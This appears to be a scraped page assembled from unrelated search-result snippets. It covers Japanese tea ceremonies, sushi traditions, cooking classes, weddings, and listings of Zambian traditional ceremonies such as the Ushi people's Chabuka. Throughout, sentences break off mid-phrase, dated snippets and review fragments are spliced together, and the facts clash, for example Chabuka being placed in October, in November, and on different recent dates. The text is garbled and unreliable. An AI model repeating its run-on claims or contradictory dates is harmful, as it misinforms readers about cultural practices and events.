31, 2023 · Attending a traditional tea ceremony in Japan is one of the quintessential things you can do here.  CEREMONY MONTH Samfya Ng&rsquo;umbo Kwanga Octobe Chienge Shila Mabila October Kawambwa Lunda Umutomboko July Chienge Bwile Bwile September Kawambwa Chishinga Chishinga Malaila October Mansa, Milenge and Chembe Ushi Chabuka Baushi October Mansa Ushi Makumba August DISTRICT TRIBE CEREMONY MONTH Luangwa Nsenga-Luzi Mbambala November Chinyunyu Soli Join us on an enlightening journey through the captivating history and rich culture of the Ushi people of Zambia! 🌍 In this video, we delve into the origins, traditions, and historical Jun 20, 2018 · The Bemba recreate their migration to Zambia in the annual Ukusefya Pa Ngwena traditional festival that takes place in Mungwi District.  The immaculate shrine grounds make for a magical setting for the tea ceremony, especially in May when the wisteria bloom.  Marriage Ceremony: The boy has to go work for his bride&rsquo;s father and show his worth.  Sushi is known for its unique combination of flavors, textures, and An authentic Japanese culture experience, ranging from tea ceremony, sushi, geisha, pottery, sword, sumo, etc and private access to bespoke property and venues normally only open through referrals.  &quot;the way of tea&quot; or 茶の湯, chanoyu) is a Japanese tradition steeped in history.  [1] Central Province Ushi: October Lusaka Province Ceremony District Chief Tribe Month Kuomboka: Jun 14, 2016 · The Chabuka traditional ceremony is held every year as a thanksgiving event by the Ushi people in remembrance of their ancestors crossing of the Luapula River from Kola in Congo DR to Zambia.  Literally meaning &ldquo;Japanese sweets,&rdquo; it&rsquo;s an edible art form that you&rsquo;ll find almost everywhere throughout Japan, and which are often seen as an element used in traditional tea ceremonies.  sokontwe milambo.  1 day ago · &quot;You are my Sun, my Moon, and all my Stars&quot; Aditi Rao Hydari and Siddharth got married at a 400-year-old temple in Wanaparthy, Telangana.  Hi am Bash from kuwait .  克年 三沢 / Flickr The tea drinking custom was introduced to Japan from China in the Heian period (9th~12th century).  Hiroyuki Konaki, a chef at Miyako-zushi in Tokyo&rsquo;s Itabashi Ward, admits traditional sushi restaurants have become less popular over the years as economic conditions have grown tighter and younger generations gravitate toward meat over fish.  On the day of the Kulamba Kubwalo, the Chief whose title is Senior Chief Mukuni Ng&rsquo;ombe is escorted from his palace to eight different sites that represent the stops that were made by theLenje tribe during their migration from present day Democratic Republic Dec 29, 2023 · Kyoto sushi is a testament to the harmonious blend of traditional and modern sushi-making techniques.  Mori prepares a traditional matcha tea at the end of every meal and offers a tea pairing for $55 per person.  Jan 1, 2024 · In most countries around the world, adaptation of traditional sushi has meant that types such as California rolls, prawn tempura rolls, and tuna mayo rolls are amongst the most popular.  Nov 8, 2015 · Chabuka traditional ceremony of the Ushi people took place yesterday in Matanda chiefdom.  mabumba kalaba.  Appreciation for the delicate flavors and carefully selected utensils (that reflect the season or occasion) is key to the ceremony.  There are cultural activities such as singing, dancing and playing drums.  Zambian Traditional Ceremonies. Me and my husband had so much fun in Maikoya, we wears Japanese traditional clothes for cooking .  If you seek to understand what it&rsquo;s like to have a tea ceremony, in this guide, we break down the basics of a Japanese tea ceremony as well as the etiquette.  Traditional techniques like &ldquo;nigiri&rdquo; and &ldquo;maki&rdquo; continue to be the foundation of Kyoto sushi.  However, in true Japanese fashion, most traditional sushi rolls are modest in filling and don&rsquo;t contain many fried options.  Apr 30, 2024 · Mori prepares a traditional matcha tea at the end of every meal and offers a tea pairing for $55 per person.  The meal was simple and meditative.  Sake is an excellent pairing with your sushi.  Guests to this traditional tea ceremony will have opportunities to cook several Japanese delicacies and sweets, such as three color dango, strawberry daifuku mochi, and two different designs of nerikiri wagashi. .  Afterwards, guests will participate in the traditional Japanese tea ceremony, guided by a certified, experienced tea master.  Learn the proper way to eat sushi and impress others with your knowledge. they speaks english and explained everything's in details and they are so kind .  1.  San-san-ku-do: Traditional Japanese Wedding Ceremony.  matanda kalasalukangaba.  The tea ceremony is known as chanoyu, or sado, in Japanese, and the art and performance of preparing and presenting matcha powdered green tea is Dec 15, 2020 · There is traditional-style sushi in which pristine slices of fresh raw fish and seafood are atop vinegared warm rice.  Before becoming a chef, Mori regularly trained in traditional Japanese tea ceremony in Feb 1, 2017 · In the past, we introduced &quot;Shiki-bocho&quot;, a traditional Japanese knife ceremony which is said started 1200 years ago.  For this recipe, use 2&frac14; cups uncooked Japanese short-grain white rice, 2&frac14; cups water, and 1 piece kombu (dried kelp) to cook the rice.  A piece of fish (called the &lsquo;neta,&rsquo; or &lsquo;tane&rsquo;) on top of a piece of rice (koshihikari, or koshi rice if you are lucky), or wrapped up in a roll of rice and nori is traditional.  Traditional Japanese Tea Ceremony in Miyajima Because of the use of abundant ingredients, it was said to cost &ldquo;One ryo of gold per box,&rdquo; (one ryo is equivalent to about US $3500 in 2022 and one box had a capacity of about 1800 cc), and it is a traditional sushi that always appears at celebrations such as festivals, housewarming gifts, and for the hospitality of important guests.  The ceremony typically takes place in local government offices or community centers, where the young adults gather to listen to speeches by local The traditional pairing is simply hot green tea or genmaicha, a type of green tea combined with roasted brown rice.  &quot;ox-hour shrine-visit&quot;) or ushi no koku mairi (丑の刻参り) [2] refers to a prescribed method of laying a curse upon a target that is traditional to Japan, so-called because it is conducted during the hours of the Ox (between 1 and 3 AM). The staff are very Friendly and helpful .  In practice, modern kaiseki is actually a style of cooking and food presentation that evolved over the last few centuries, bringing together a wide variety of high-end cooking techniques Aug 27, 2024 · Five nights a week, Ginza Onodera alumna Nozomi Mori serves an exquisite omakase ($250) with a touch of Osaka-style flair and elements of traditional Japanese tea ceremony.  There are countless varieties of nigirizushi, some of the most common ones being tuna, shrimp, eel, squid, octopus and fried egg.  The bride and groom, dressed in traditional Japanese kimono, both drink sake in a highly ritualized ceremony known as san-san-ku-do, which literally translates as &lsquo;three-three-nine-times&rsquo;.  Jul 5, 2019 · How To Eat Sushi in Japanese Traditional Way.  Jason Walton / Flickr.  Please follow my Sushi Rice recipe for step-by-step instructions on how to cook the rice and add the sushi seasoning.  Dec 12, 2021 · Chabuka traditional ceremony of the Ushi people took place yesterday and here Chief Matanda of the Ushi people of Mansa District is explaining the historical crossing details to Chief The Japanese tea ceremony (茶道, sadō or chadō, lit. ; The history of sushi traces back to its origins in Southeast Asia, with the Japanese improving upon the preservation technique by adding vinegar to the rice.  Before becoming a chef, Mori regularly trained in traditional Japanese tea ceremony in Jul 2, 2024 · Miso soup, made from fermented soybean paste, is a staple in Japanese cuisine&mdash;often served as part of a traditional breakfast. Kindly take time to watch this video so you know the real truth about Chabuka Traditional ceremony of the Ushi people of Mansa District in Luapula Province of the Republic of Zambia.  ANNUAL TRADITIONAL CEREMONIES OF ZAMBIA: CENTRAL PROVINCE: DISTRICT: CHIEF : TRIBE: CEREMONY: MONTH: CENTRAL PROVINCE: Mumbwa: Snr Chief Shakumbila: Sala: Ikuba Lya Mori prepares a traditional matcha tea at the end of every meal and offers a tea pairing for $55 per person.  Prepare before you eat There is a wet towel available for you to clean your hands before you eat.  Another trend in modern sushi-making is the use of non-traditional ingredients and flavor combinations.  Typically, Bollywood weddings are lavish and full of The origins of Kaiseki date back to the 16th century in Japan &mdash; a cuisine served as part of a tea ceremony that has evolved into modern-day Kaiseki; a varying presentation of nine to 10 dishes prepared hot and cold, and delicately arranged in a manner that brings out incredible yet subtle flavors based on seasonal ingredients.  Traditional ceremonies are one of the best glimpses into Zambian culture.  The term also refers to the collection of skills and techniques that allow the preparation of such meals and is analogous to Western haute cuisine. D.  Sep 29, 2009 · The Chabuka traditional ceremony is held every year as a thanks giving event by the Ushi people in remembrance of their ancestors crossing of the Luapula river from Kola in Congo DR to Zambia Sep 5, 2024 · Embark on a journey to uncover the art of Japanese cuisine with this one-of-a-kind experience in Osaka! Immerse yourself in a traditional tea ceremony, master the craft of sushi and ramen making under the expert guidance of Katsuji, savor the delectable dishes you create, and depart with enhanced culinary abilities and a personalized keepsake &ndash; a piece of custom calligraphy art by Katsuji.  The Chabuka traditional ceremony of the Ushi takes place every November in Matanda chiefdom.  Of course, you would make a bowl of tea by yourself! It&rsquo; a lot of fun to make sushi and miso soup by yourself and experience a traditional tea The pre-ceremony lasts a week and featuresdancing and displays of traditional foods.  Away from the busy city streets, you can enjoy a moment of calm and thoughtfulness during this tea ceremony in Ginza.  The acting couple exchanged vows in an intimate ceremony with close friends and family in attendance.  The ingredients are often raw, but some variations may involve cooked or pickled ingredients.  Discover the dos and don'ts of traditional sushi dining etiquette.  Nov 15, 2013 · Traditional sushi is very simple.  What is Doyo Ushi no Hi? Doyo Ushi no Hi is a special day that occurs during the doyo period, which is the 18-day period that precedes each of the four seasonal changes in Japan.  Mar 29, 2024 · During the Coming of Age Ceremony, young adults dress in traditional attire, with women wearing elegant furisode (long-sleeved kimono) and men donning formal suits or hakama (traditional trousers).  Then you have the present-day sushi which may be rooted in the Japanese tradition but have gone through some creative makeover or individual rendition by modern chefs.  Contents.  she taught us how to cook Miso Soup , Tamagoyaki(traditional rolled egg),and Maki sushi .  Traditional Japanese weddings are usually conducted in the grounds of a Shinto shrine.  Feb 13, 2015 · Sado, the Japanese traditional tea ceremony, refers to serving tea to guests in a designated style.  Jul 17, 2024 · This traditional Japanese event is celebrated by eating unagi (eel), a practice believed to invigorate the body and provide stamina during the hottest days of summer.  In this article, I explore one of the rich traditional ceremony called Ichibwela Mushi.  mansa &amp; milenge Feb 16, 2024 · Key Takeaways.  chisunka mibenge. we learned how to cook from a very kind teacher.  5 days ago · Nerikiri wagashi are small traditional Japanese sweet treats made from plant-based ingredients (the main dough is a mix of beans and rice powder).  I&rsquo;m sure you will get a lot of knowledge of Japanese cuisine joining my class.  This is because eating maki and nigiri in traditional ways require you to use our own fingers instead of the chopsticks.  Speak with your server to ask for assistance in choosing a sake for your meal.  This relationship was one feature of traditional sushi shops,&rdquo; he adds.  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